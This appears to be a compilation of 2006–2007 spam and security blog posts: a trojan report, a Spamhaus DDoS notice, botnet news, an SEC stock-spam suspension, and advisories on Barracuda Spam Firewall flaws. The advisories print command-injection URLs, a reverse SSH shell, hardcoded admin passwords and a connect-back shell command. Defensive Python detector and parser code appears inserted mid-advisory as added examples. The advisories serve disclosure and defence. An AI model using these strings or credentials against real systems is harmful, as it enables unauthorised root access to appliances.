TROJ_STRAT.GI
Malware type: Trojan
Aliases: No Alias Found
In the wild: Yes
Destructive: No
Language: English
File type: PE
Memory resident: Yes
Size of malware: 20,576 Bytes (compressed)
Initial samples received on: Jun 11, 2007
Payload 1: Downloads files
Details: This Trojan arrives as an attachment to email messages spammed by another malware or a malicious user.
It accesses the following Web site to download and execute a file:
http://{BLOCKED}esunhaxazedesa.com/getw.exe - detected by Trend Micro as WORM_STRAT.GI
As a result, routines of the downloaded worm are also exhibited on the affected system.
It comes with its own compression and runs on Windows 98, ME, NT, 2000, XP, and Server 2003.
Analysis By: Luis Antonio P. Magisa
Copyright (c) 1989-2007 Trend Micro Incorporated. All rights reserved.
Labels: Spam, Trojan
Spamhaus's web servers came under a DDoS attack starting yesterday at
just after 21:00 GMT. The attack is being carried out by the same people
responsible for the BlueSecurity DDoS last year, using the
Storm malware.
The attack method was sufficiently different to previous DDoS attacks on
us that some of it got through our normal anti-DDoS defenses and halted
our web servers.
At 02:00 GMT we got the attack under control and our web servers are now
back up, www.spamhaus.org is running again as normal.
The attack is ongoing, but it's being absorbed by anti-DDoS defenses.
Also under attack by the same gang are SURBL and URIBL.
Storm is the 'nightmare' botnet, capable of taking out government
facilities and causing much mayhem on the internet. It has 3 functions:
sending spam, fast-flux web and dns hosting mainly for stock scams, and
DDoS. There is a hefty international effort underway by cyber-forensics
teams in a joint effort by law enforcement and private sector botnet and
malware analysts to trace the perpetrators.
--
Steve Linford
The Spamhaus Project
http://www.spamhaus.org
Labels: Attack Tools, Botnet, DoS, Spam
Cyber-mobsters drop DoS attacks
Extortion technique no longer profitable, say experts
Shaun Nichols in California, vnunet.com 27 Apr 2007
The practice of holding websites hostage under the threat of denial-of-service (DoS) attacks is declining, according to security researchers at Symantec.
DoS attacks are carried out by botnet operators using armies of remotely controlled PCs to flood a site with traffic and information requests. The attacks can cause sites and web services to run slowly or shut down altogether.
Criminals use the attacks to extort money from organisations by launching a first DoS attack and then threatening to launch further attacks unless the company pays up.
The tactic has recently drawn the attention of legislators, who passed laws last November allowing for tougher punishments for the crime.
Symantec said that it has seen a steady decline in the number of reported DoS incidents in the past six months, and believes that much of it is due to the inefficiency of the practice.
The problem for the criminals, according to Symantec security engineer Yazan Gable, is that the brute-force attacks are often costly and inefficient for the botnet operator.
"Whenever a botnet owner carries out a DoS attack they run the risk of losing some of their bots," Gable said in an article for the company's security response blog.
"This could happen either because an attacking computer is identified and disinfected, or simply blocked by its ISP from accessing the network.
"Furthermore, if the botnet owner is not careful they could lose their entire network if their command and control server is identified."
Another problem for botnet operators arises when the victim calls the attacker's bluff and refuses to pay.
"Since the target has refused to pay, it is likely that they will never pay. As a consequence, the attacker has spent time and resources on a lost cause," wrote Gable.
The security engineer added that the drop in DoS extortion may also be due to the increased use of botnets to deliver large-scale spam mailings.
Gable noted that the drop in DoS attacks has coincided with a dramatic rise in spam volumes, suggesting that the lower-risk, more lucrative spam market may be luring botnet owners away from the DoS attack business.
Labels: Botnet, DoS, News Article, Spam
Windows insecurity leads to the creation of botnets which are used to send oceans of spam to everyone. This is about a proposal to try to stem that tide. Of course if spam is stopped the botnets will still be there and used by the criminal gangs for other purposes. Ed.
=====================================
Spam storm needs ISP action, urges security chief
By Will Sturgeon
Published: Wednesday 14 March 2007
Ispa, the UK's internet service providers' association, will today make a presentation to the House of Lords science and technology committee on computer security and spam.
The session, which follows the submission of a written response, coincides with claims the number of compromised PCs – known as botnets – in the UK has tripled over the past year.
And one security expert claims ISPs are still shirking their responsibilities.
Speaking about the growing problem of botnets and the deluge of spam they create, David Rand, CTO of security company Trend Micro, told silicon.com: "I absolutely believe this is the ISPs' responsibility. Yet top ISPs still aren't doing anything."
Rand said: "It's not like the ISPs can't tell this is going on. They can see all this on their networks."
Many leading ISPs currently refuse to take measures such as blocking port 25 traffic, a move which Rand claimed would affect very few users sending legitimate email, while blocking the port used to relay email via the internet on compromised machines.
And he expressed doubts that ISPs would ever volunteer such measures to legislators because they fear taking greater responsibility for the use of their networks and the implications of increased operating costs.
A spokesman for Ispa said it understands the majority of spam originates from compromised PCs connected to its members' broadband services - and those of other ISPs - often unbeknownst to customers. But he said it is not the ISPs' lone responsibility to solve the problem, suggesting legislation and end-user education are essential tools in the fight.
The Ispa spokesman told silicon.com: "No ISP wants to tolerate any criminal activity on their network."
He also denied suggestions ISPs have been slow or unwilling to act on the matter. "If there was a flick-switch solution to this, we would have done it," he said.
Trend Micro's Rand told silicon.com the number of infected PCs has tripled in the UK over the past year, according to his company's research.
This means more UK homes and businesses are operating compromised PCs which - as well as sending vast volumes of spam - could potentially be plundered for sensitive data such as passwords or bank details.
Rand told silicon.com one reason for the upsurge in rogue activity on European networks dates back to a major fibre cut between China and Taiwan in December 2006. At that time botnet activity switched dramatically from China to Europe within around six minutes, he said.
Rand said millions of infected machines in Europe were brought online by the criminals who control them remotely, showing not only a vast amount of redundancy built into these criminal networks but also "highly sophisticated" business continuity plans.
He said: "These criminals have a very advanced command and control structure. We've got a real challenge ahead of us to take that down. And we've not managed it yet."
Labels: Botnet, News Article, Spam
WASHINGTON (Reuters) - The Securities and Exchange Commission suspended trading on Thursday in the stocks of 35 small companies linked to spam e-mail campaigns urging small investors to buy shares.
The SEC said it launched an enforcement effort to protect investors from potentially fraudulent spam e-mail promoting small company stocks with phrases like "Ready to Explode," "Ride the Bull" and "Fast Money."
"Today's action will disrupt the operations of these boiler rooms and make it harder for the spammers and promoters to dump their stock on an unsuspecting public," SEC enforcement director Linda Thomsen said at a press conference on Thursday.
The commission said in a statement that an estimated 100 million of these spam messages are sent every week, triggering dramatic spikes in share price and trading volume before the spamming stops and investors lose their money.
It said the stocks halted typically sell for less than $1 per share and are quoted on the Pink Sheets quotation service. The trading suspensions began on Thursday and will last for 10 business days, ending at noon on March 21, the agency said.
Mark Schonfeld, director of the SEC's northeast regional office, said that investor losses related to the 35 companies are in the tens of millions of dollars.
"Now that we have stopped the trading in these stocks, we will focus our attention on the people behind the spam and profiting from it," Schonfeld said.
He said the SEC is investigating the companies themselves as well as outsiders, and that the same people are likely behind multiple spam campaigns.
In one spam campaign involving Apparel Manufacturing Associates (APPM.PK), the SEC said the company's stock closed at 6 cents on trading volume of 3,500 shares on Friday, December 15, 2006.
After a weekend spam campaign distributed e-mails proclaiming "Huge news expected out on APPM, get in before the wire, We're taking it all the way to $1.00," trading volume on Monday, December 18, 2006, soared to 484,568 shares with the price spiking to over 19 cents a share.
Two days later the APPM price climbed to 45 cents. However, by December 27, 2006, the price had slumped to 10 cents on trading volume of 65,350 shares, the agency said.
SEC Chairman Christopher Cox said that not even the investor protection agency is immune to the onslaught of stock-related spam. He said the SEC's public affairs director, John Nester, received an e-mail touting the stock of one of the 35 companies.
"Not even the SEC's spam filter can stop all this spam," Cox said.
The SEC said it suspended trading in the following stocks:
+ Advanced Powerline Technologies Inc.
+ America Asia Petroleum Corp.
+ Amerossi Int'l Group, Inc.
+ Apparel Manufacturing Associates, Inc.
+ Asgard Holdings Inc.
+ Biogenerics Ltd.
+ China Gold Corp.
+ CTR Investments & Consulting, Inc.
+ DC Brands International, Inc.
+ Equal Trading, Inc.
+ Equitable Mining Corp.
+ Espion International, Inc.
+ Goldmark Industries, Inc.
+ GroFeed Inc.
+ Healtheuniverse, Inc.
+ Interlink Global Corp.
+ Investigative Services Agencies, Inc.
+ iPackets International, Inc.
+ Koko Petroleum Inc.
+ Leatt Corporation
+ LOM Logistics, Inc.
+ Modern Energy Corp.
+ National Healthcare Logistics, Inc.
+ Presidents Financial Corp.
+ Red Truck Entertainment Inc.
+ Relay Capital Corp.
+ Rodedawg International Industries, Inc.
+ Rouchon Industries, Inc.
+ Software Effective Solutions Corp.
+ Solucorp Industries Ltd.
+ Sports-stuff.com Inc.
+ UBA Technology, Inc.
+ Wataire Industries Inc.
+ WayPoint Biomedical Holdings, Inc.
+ Wineco Productions Inc.
Labels: Spam
Barracuda Networks Spam Firewall Multiple Vulnerabilities
Bugtraq ID: 19276
Class: Unknown
Remote: Yes
Local: No
Published: Aug 01 2006 12:00AM
Updated: Aug 08 2006 10:46PM
Credit: Greg Sinclair has been credited with the discovery of these vulnerabilities.
Vulnerable: Barracuda Networks Barracuda Spam Firewall 3.3.03.055
Barracuda Networks Barracuda Spam Firewall 3.3.03.053
Barracuda Networks Barracuda Spam Firewall 3.3.01.001
Spam Firewall is prone to multiple vulnerabilities, including a directory-traversal issue, an access-validation issue, and a remote command-execution issue.
A remote attacker can exploit these issues to gain access to potentially sensitive information and execute commands in the context of the affected application.
-------
Matthew Hall (lists ecsc co uk)
Severity: High - Full system compromise possible
Date: 04 August 2006
Discovered by: Matthew Hall (matt (at) ecsc.co (dot) uk ) (Credits for original discovery to Greg Sinclair)
Discovered on: 03 Aug 2006
Summary:
Lack of input sanitisation in the Barracuda Spam Firewall web interface
allows execution of commands by unauthenticated users.
Combined with privilege elevation techniques, execution of commands as
the root user is possible, allowing a full system compromise.
Details:
Following up on bid 19276 - 'Barracuda Vulnerability: Arbitrary File
Disclosure [NNL-20060801-02]' by Greg Sinclair, the Internet Defence
Security Team performed further investigation and discovered several
additional vulnerabilities which, when leveraged with privilege
escalation techniques, allowed the remote execution of commands as the
root user without any authentication.
The original discovery by Greg Sinclair showed that it was possible to
open arbitrary files, either owned by the user/group 'nobody:nogroup' or
with world-read access, through the web interface using a path
sanitisation vulnerability in preview_email.cgi, e.g:
https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp
Access to the path '/cgi-bin/preview_email.cgi' does not require any
authentication.
This vulnerability also allows the pipe character (|) to be used, so that
the stdout of any program run is redirected to the stdin of the file open
function and the output of the command is printed back to the web
interface, e.g:
https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20-la%20/|
It was then possible to gain further privileges, as the user the http
daemon runs as (nobody) is granted root-level access to several system
commands via sudo, e.g:
https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../usr/bin/sudo%20touch%20/foo|
(Repeating the previous command should then show that the file 'foo' has
been created with root permissions in '/'.)
The commands allowed (this is not a canonical list) include:
mkdir, mv, cp, kill, ls, ln, chown, chmod, rm, echo, cat
(as well as access to several 'wrapper' scripts in
/home/emailswitch/code/firmware/current/bin/)
Access to commands such as chown and chmod allowed further privilege
escalation by setting the 'suid' bit on several other system programs,
which could then be executed through the web interface, without the use
of sudo, and would run with root privileges.
As such, a complete system compromise is possible remotely through the
web interface without any authentication.
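The two vectors described above leave a recognisable trace in the appliance's web access log. The following detector is an added example, not Barracuda's code or part of this advisory: it decodes the 'file' parameter of each preview_email.cgi request and reports a '..' path that escapes the message-log directory or a pipe character that turns the file open into a command. BASE_DIR and the log format are assumptions; the log lines are constructed, not captured traffic.

```python
"""Flag abuse of preview_email.cgi in a web access log (added example)."""
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Directory the CGI is expected to read from (assumed from the advisory's
# '/mail/mlog/../' prefix).
BASE_DIR = "/mail/mlog"

# Apache combined-style line: client, [time], "METHOD path proto", status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def classify(request_path):
    """Return the reasons a preview_email.cgi request looks malicious.

    An empty list means the request stays inside BASE_DIR and has no pipe.
    """
    parts = urlsplit(request_path)
    if not parts.path.endswith("/cgi-bin/preview_email.cgi"):
        return []
    reasons = []
    # parse_qs decodes %xx once; the extra unquote() also catches a
    # double-encoded '%252e%252e' evasion of a naive '..' filter.
    for raw in parse_qs(parts.query, keep_blank_values=True).get("file", []):
        value = unquote(raw)
        # A leading or trailing '|' makes a two-argument open() run the
        # value as a shell command instead of reading a file.
        if value.startswith("|") or value.endswith("|"):
            reasons.append("pipe character in file parameter")
        # Collapse '..' segments and check the result is still under BASE_DIR.
        target = posixpath.normpath(posixpath.join(BASE_DIR, value.strip("|")))
        if target != BASE_DIR and not target.startswith(BASE_DIR + "/"):
            reasons.append("path escapes %s: %s" % (BASE_DIR, target))
    return reasons


def scan_log(lines):
    """Return (client_ip, request_path, reasons) for each suspicious line."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        client, _method, path, _status = match.groups()
        reasons = classify(path)
        if reasons:
            hits.append((client, path, reasons))
    return hits


# Constructed sample log (not real traffic): a benign preview, the advisory's
# backup-config traversal, the trailing-pipe command, and an unrelated request.
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Aug/2006:10:00:01 +0000] "GET /cgi-bin/preview_email.cgi'
    '?file=/mail/mlog/2006/08/msg001.txt HTTP/1.1" 200 2048',
    '198.51.100.7 - - [03/Aug/2006:10:00:02 +0000] "GET /cgi-bin/preview_email.cgi'
    '?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp HTTP/1.1" 200 9120',
    '198.51.100.7 - - [03/Aug/2006:10:00:03 +0000] "GET /cgi-bin/preview_email.cgi'
    '?file=/mail/mlog/../../bin/ls%20-la%20/| HTTP/1.1" 200 512',
    '10.0.0.9 - - [03/Aug/2006:10:00:04 +0000] "GET /cgi-bin/index.cgi HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for client, path, reasons in scan_log(SAMPLE_LOG):
        print(client, path, "; ".join(reasons))
```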
It was also noted in bid 19276 - 'Barracuda Vulnerability: Hardcoded
Password [NNL-20060801-01]' that a hardcoded 'guest' user password
existed, which was 'bnadmin99'.
During further investigation it was noted that there was also a
hard-coded 'admin' user password (this is the admin user for the web
interface), which is only possible to use if the httpd environment
variable 'REMOTE_ADDR' equals '127.0.0.1'.
If so, it is possible to log in to the web interface as the admin user
using the password 'adminbn99'.
In order to gain elevated privileges to log in to the web interface as
the admin user, it is possible to bind a reverse ssh shell which would
eventually satisfy the 'remote_addr == localhost' check.
It was possible to expose the ssh rsa public key, which could then be
copied to a user's '.ssh/authorized_keys2' on a local machine, e.g:
https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/cat%20/home/emailswitch/code/config/id_rsa.pub|
With the public key in the authorized_keys2 file, it was then possible
to initiate the reverse shell from the web interface, e.g:
https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../usr/bin/ssh%20-T%20-i%20/home/emailswitch/code/config/id_rsa%20-R%208080:localhost:443%20@|
It was then possible to log in to 'https://127.0.0.1:8080/' with the
username 'admin' and password 'adminbn99' and manage the device as
an administrator.
It was noted that the original file input sanitisation vulnerability
seems to have been 'silently' fixed by Barracuda Networks (as of 11pm GMT
03/08/06), which mitigates the attacks above.
So far, no advisories or update notices can be found on their website,
and the version numbers of the affected software remain the same.
Recommendations:
We agree with Greg Sinclair's statement that the web interface should
never be made accessible from untrusted networks like the Internet.
The web interface on the Barracuda Spam Firewall has a history of
similar issues, so we believe that it is highly likely that more
vulnerabilities will be found in the future.
Exploit
Attackers can exploit these issues via a web client.
The following proof-of-concept URIs are available.
/data/vulnerabilities/exploits/BarracudaDirectoryTraversalVulnerabilityAugust12006.html
/data/vulnerabilities/exploits/BarracudaRemoteCommandAugust032006.html
/data/vulnerabilities/exploits/BarracudaSpamFireWallExploitAugust082006.pl
Versions 3.3.01.001 to 3.3.03.055 are vulnerable to these issues.
Labels: Appliance, Email, Spam, Vulnerability
Barracuda Spam Firewall default account
gssinclannlsoftware.com
Date: Tue Aug 01 2006 - 16:18:15 CDT
Title: Barracuda Hardcoded Password Vulnerability
Severity: High (Sensitive Information Disclosure)
Date: 01 August 2006
Version Affected: Barracuda Spam Firewall version 3.3.01.001 to 3.3.03.053
Discovered by: Greg Sinclair (gssinclannlsoftware.com)
Discovered on: 28 May 2006
Overview:
Barracuda Spam Firewalls (www.barracudanetworks.com) are vulnerable to information disclosure, which is made possible by a default guest password.
Details:
The Barracuda Spam Firewalls from version 3.3.01.001 to 3.3.02.053 have a hardcoded password for the "guest" account in the Login.pm script. This script is called to validate any user who attempts to login to the barracuda's web interface (typically at http://:8080 or https://). While the guest account has limited access, the following information can be obtained:
* system configuration including IP accesses, admin IP ACLs
* email message logs (but not the content of the messages)
* version information of both spam/antivirus definitions and system firmware version
Used in conjunction with the vulnerability "Barracuda Arbitrary File Disclosure" (NNL-20060801-02), the integrity of the system can be compromised. An attacker can use both vulnerabilities to download both confidential emails as well as the configuration information (including the admin password).
Additionally, while some accounts such as "admin" are bound by user definable IP ACLs, the guest account is not. This means that sensitive information can be disclosed to ANY IP address regardless of the user defined network restrictions.
Proof of Concept:
Enter the username "guest" into the login page of any open barracuda and the password "bnadmin99"
Recommendations:
* Never allow your Barracuda web interface to be accessible from untrusted networks (especially the Internet)
* Upgrade to version 3.3.0.54 or later
Vendor Contact:
29 May 2006 - Initial Vendor Contact
24 June 2006 - Vendor replies with prospect of fix
17 July 2006 - NNL request status update, no reply
01 Aug 2006 - NNL releases vuln report, notifies vendor of release
Labels: Advisory, Appliance, Email, Spam, Vulnerability
Jean-Sébastien Guay-Leroux jean-sebastien at guay-leroux.com
Tue Apr 4 00:51:17 BST 2006
Topic: Barracuda LHA archiver security bug leads to remote compromise
Announced: 2006-04-03
Product: Barracuda Spam Firewall
Vendor: Barracuda Networks
Impact: Remote shell access
Affected product: Barracuda with firmware < 3.3.03.022 AND
spamdef < 3.0.10045
Credits: Jean-Sébastien Guay-Leroux
CVE ID: CVE-2004-0234
I. BACKGROUND
The Barracuda Spam Firewall is an integrated hardware and software solution for
complete protection of your email server. It provides a powerful, easy to use,
and affordable solution to eliminating spam and viruses from your organization by
providing the following protection:
* Anti-spam
* Anti-virus
* Anti-spoofing
* Anti-phishing
* Anti-spyware (Attachments)
* Denial of Service
II. DESCRIPTION
When building a special LHA archive with long filenames in it, it is possible to
overflow a buffer on the stack used by the program and seize control of the
program.
Since this component is used when scanning an incoming email, remote compromise
is possible by sending a simple email with the specially crafted LHA archive
attached to the Barracuda Spam Firewall.
You do NOT need remote administration access (on port 8000) for
successful exploitation.
For further information about the details of the bugs, consult OSVDB
#5753 and #5754.
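The flaw described above is a header parser that trusts the filename length it reads from the archive. The following parser is an added example, not code from this advisory, Barracuda or the LHA project: it reads an LHA level-0 header and refuses the filename unless it fits both the caller's buffer and the header's own declared size, which is the check a scanner needs before copying the name into a fixed buffer. The field layout is the published level-0 format; name_buf_size and the sample headers are constructed here.

```python
"""Bounds-checked parser for an LHA level-0 archive header (added example)."""
import struct

NAME_OFFSET = 22   # filename starts after the fixed fields
CRC_LEN = 2        # 16-bit CRC follows the filename


class BadHeader(ValueError):
    """Header is malformed or does not fit within its own declared size."""


def parse_level0_header(buf, name_buf_size=255):
    """Parse one level-0 header from buf and return its fields.

    buf[0]     header size H: number of bytes that follow the first two
    buf[1]     checksum: sum(buf[2:H+2]) mod 256
    buf[2:7]   method id, e.g. b"-lh5-"
    buf[7:15]  packed size, original size (two little-endian uint32)
    buf[15:19] MS-DOS time/date, buf[19] attribute, buf[20] level (0)
    buf[21]    filename length N, buf[22:22+N] filename, then the CRC
    """
    if len(buf) < NAME_OFFSET:
        raise BadHeader("truncated header")
    header_size, checksum = buf[0], buf[1]
    if len(buf) < header_size + 2:
        raise BadHeader("declared header size exceeds available data")
    if sum(buf[2:header_size + 2]) % 256 != checksum:
        raise BadHeader("header checksum mismatch")
    if buf[20] != 0:
        raise BadHeader("not a level-0 header")
    name_len = buf[21]
    # The unsafe pattern trusts name_len and copies that many bytes into a
    # fixed stack buffer. Check it against both the caller's buffer (an
    # assumed size) and the header's own declared length before copying.
    if name_len > name_buf_size:
        raise BadHeader("filename longer than destination buffer")
    if NAME_OFFSET + name_len + CRC_LEN > header_size + 2:
        raise BadHeader("filename does not fit inside the declared header")
    packed, original = struct.unpack_from("<II", buf, 7)
    name = bytes(buf[NAME_OFFSET:NAME_OFFSET + name_len])
    crc = struct.unpack_from("<H", buf, NAME_OFFSET + name_len)[0]
    return {"method": bytes(buf[2:7]), "packed": packed,
            "original": original, "name": name, "crc": crc}


def is_safe_header(buf, name_buf_size=255):
    """True when the header parses cleanly under the given buffer limit."""
    try:
        parse_level0_header(buf, name_buf_size)
    except BadHeader:
        return False
    return True


def build_level0_header(name, declared_name_len=None):
    """Construct a test header; declared_name_len lets a test lie about N."""
    body = b"-lh5-" + struct.pack("<II", 10, 20) + b"\x00" * 4 + b"\x20\x00"
    n = len(name) if declared_name_len is None else declared_name_len
    body += bytes([n]) + name + b"\x00\x00"          # name, then 16-bit CRC
    return bytes([len(body), sum(body) % 256]) + body
```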
III. IMPACT
Gain shell access to the remote Barracuda Spam Firewall
IV. PROOF OF CONCEPT
Using the PIRANA framework, available at http://www.guay-leroux.com, it is
possible to test the Barracuda Spam Firewall against the LHA vulnerability.
By calling PIRANA the way it is described below, you will get a TCP connect back
shell on IP address 1.2.3.4 and port 1234:
perl pirana.pl -e 0 -h barracuda.vulnerable.com -a postmaster -s 0 -l 1.2.3.4 \
-p 1234 -z -c 1 -d 1
V. SOLUTION
Barracuda Networks pushed an urgent critical patch in spamdef #3.0.10045,
available March 24th 2006.
They also published an official patch in firmware #3.3.03.022, available April
3rd 2006.
It is recommended to update to firmware #3.3.03.022.
VI. CREDITS
Ulf Harnhammar, who found the original LHA flaw.
Jean-Sébastien Guay-Leroux, who conducted further research on the bug
and produced an exploitation plugin for the PIRANA framework.
VII. REFERENCES
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0234
VIII. HISTORY
2006-03-02 : Disclosure of vulnerability to Barracuda Networks
2006-03-02 : Acknowledgement of the problem
2006-03-24 : Problem fixed
2006-04-03 : Advisory disclosed to public
Labels: Appliance, Bug, Spam, Vulnerability
Barracuda Spam Firewall Hashed Password Disclosure
OSVDB ID: 20879
Disclosure Date: Nov 16, 2005
Description:
Barracuda Spam Firewall contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when an end user interacts with the system, which may disclose the user's encoded password in the URL. The encoded password is transmitted without the protection of SSL encryption, but would require an attacker to sniff the connection to obtain the information.
Vulnerability Classification:
Remote/Network Access Required
Cryptographic Attack
Information Disclosure Attack
Loss Of Confidentiality
Exploit Available
Verified
Concern
Products:
Barracuda Networks Barracuda Spam Firewall 3.1.17
Solution:
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
External References:
Related OSVDB ID:
20878
Vendor: Barracuda Networks
Other Advisory URL: http://osvdb.org/ref/20/20879-barracuda.txt
Credit:
security curmudgeon - attrition.org
Labels: Advisory, Appliance, Email, Spam, Vulnerability